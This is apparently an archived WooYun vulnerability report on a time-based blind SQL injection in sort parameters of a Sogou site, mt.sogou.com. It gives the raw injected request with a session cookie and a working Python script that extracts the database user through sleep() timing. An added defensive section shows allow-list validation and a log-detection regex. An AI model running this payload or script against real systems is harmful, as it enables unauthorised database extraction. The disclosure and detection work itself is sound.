
SQL injection in a Sogou site (with verification script) by triblekill

2016-06-03 05:40

Login is required.

The HTTP request is as follows:

GET /Handlers/ScriptManager/ScriptHandler.ashx?_=1460630014907&action=getScriptList&currentPage=0&filter=%7B%22name%22:%22123%22%7D&groupId=-1&orderby=id&ordertype=desc,(select*from(select(if(ascii(substr(version(),1,1))=53,sleep(0),1)))a)&pageSize=20 HTTP/1.1
Host: mt.sogou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-XSRF-TOKEN: 8efa41b7
Referer: http://mt.sogou.com/Pages/index.html
Cookie: ASP.NET_SessionId=tpdgtgwfhq5semvkc2eq1xpy;
Connection: close



The orderby and ordertype parameters are injectable (the value is spliced into the ORDER BY clause, so a time-based blind payload such as the sleep() expression above works).

user():[email protected]
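As an added, defender-side example (not part of the original report, and not Sogou's handler code, which the report does not show): an allow-list for the orderby/ordertype sort parameters next to the raw concatenation that makes them injectable, plus a check that flags the time-based payload shape seen in the request above in constructed access-log lines. The column names, the log format and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Columns and directions the handler may sort by (assumed schema; the report
# only shows 'id' and 'createTime' being used as orderby values).
ALLOWED_ORDERBY = {"id", "createTime", "name"}
ALLOWED_ORDERTYPE = {"asc", "desc"}

def build_order_clause_unsafe(orderby, ordertype):
    """Illustrates the flaw: raw concatenation, so a value such as
    'desc,(select ... sleep(20) ...)' is spliced straight into the SQL."""
    return "ORDER BY %s %s" % (orderby, ordertype)

def order_params_valid(orderby, ordertype):
    """Allow-list check: ORDER BY targets cannot be bound as placeholders,
    so the safe option is to accept only a fixed set of identifiers."""
    return orderby in ALLOWED_ORDERBY and ordertype.lower() in ALLOWED_ORDERTYPE

def build_order_clause_safe(orderby, ordertype):
    """Build the clause from allow-listed values only, otherwise refuse."""
    if not order_params_valid(orderby, ordertype):
        raise ValueError("rejected sort parameters: %r, %r" % (orderby, ordertype))
    return "ORDER BY `%s` %s" % (orderby, ordertype.upper())

# Shape of the blind payload in the report: a nested SELECT driving sleep().
_TIME_BASED_SQLI = re.compile(
    r"select\s*\*?\s*from\s*\(\s*select|sleep\s*\(\s*\d+|if\s*\(\s*ascii\s*\(",
    re.IGNORECASE)
_REQUEST_TARGET = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')

def flag_request_line(access_log_line):
    """Return the query parameter names in one access-log line (common log
    format, constructed) whose decoded values match the payload shape."""
    m = _REQUEST_TARGET.search(access_log_line)
    if not m:
        return []
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return sorted(name for name, values in params.items()
                  if any(_TIME_BASED_SQLI.search(v) for v in values))

# Constructed sample lines: a normal listing request and the injected one.
SAMPLE_LOG = [
    '1.2.3.4 - - [03/Jun/2016:05:40:00 +0800] "GET /Handlers/ScriptManager/'
    'ScriptHandler.ashx?action=getScriptList&orderby=id&ordertype=desc HTTP/1.1" 200 512',
    '1.2.3.4 - - [03/Jun/2016:05:40:01 +0800] "GET /Handlers/ScriptManager/'
    'ScriptHandler.ashx?action=getScriptList&orderby=id&ordertype=desc,(select*from'
    '(select(if(ascii(substr(version(),1,1))=53,sleep(0),1)))a)&pageSize=20 HTTP/1.1" 200 512',
]
```

Running flag_request_line over SAMPLE_LOG flags only the ordertype parameter of the second line; the first line comes back clean.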

Proof of vulnerability:

(screenshot: 123.png)





#encoding=utf-8
# Python 2 script (httplib, print statements). Time-based blind extraction of
# user() through the ordertype parameter: when the guessed character is right,
# MySQL runs sleep(20), which exceeds the 5 s connection timeout, and the
# resulting exception is what marks the character as correct.
import httplib
import time
import string
import sys

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
    # an authenticated session is required (the original redefined headers
    # inside the loop with only this cookie; both are merged here)
    'Cookie': 'ASP.NET_SessionId=tpdgtgwfhq5semvkc2eq1xpy',
}

payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

print '[%s] Start to retrieve MySQL database()' % time.strftime('%H:%M:%S', time.localtime())

database = ''
for i in range(1, 25, 1):
    for payload in payloads:
        try:
            conn = httplib.HTTPConnection('mt.sogou.com:80', timeout=5)
            conn.request(method='GET', url="/Handlers/TaskManager/TaskHandler.ashx?action=getTempList&currentPage=0&groupId=-1&orderby=createTime&ordertype=desc,(select*from(select(if(ascii(substr(user()," + str(i) + ",1))=" + str(ord(payload)) + ",sleep(20),1)))a)&pageSize=20", headers=headers)
            status = conn.getresponse().status
            conn.close()
        except:
            # timeout: the guessed character at position i is correct
            database += payload
            print '\r[scan in progress]', database
            time.sleep(0.01)
            break

print ''
print 'database() is', database





Fix:

.


Source: www.wooyun.org/bugs/wooyun-2016-0196498
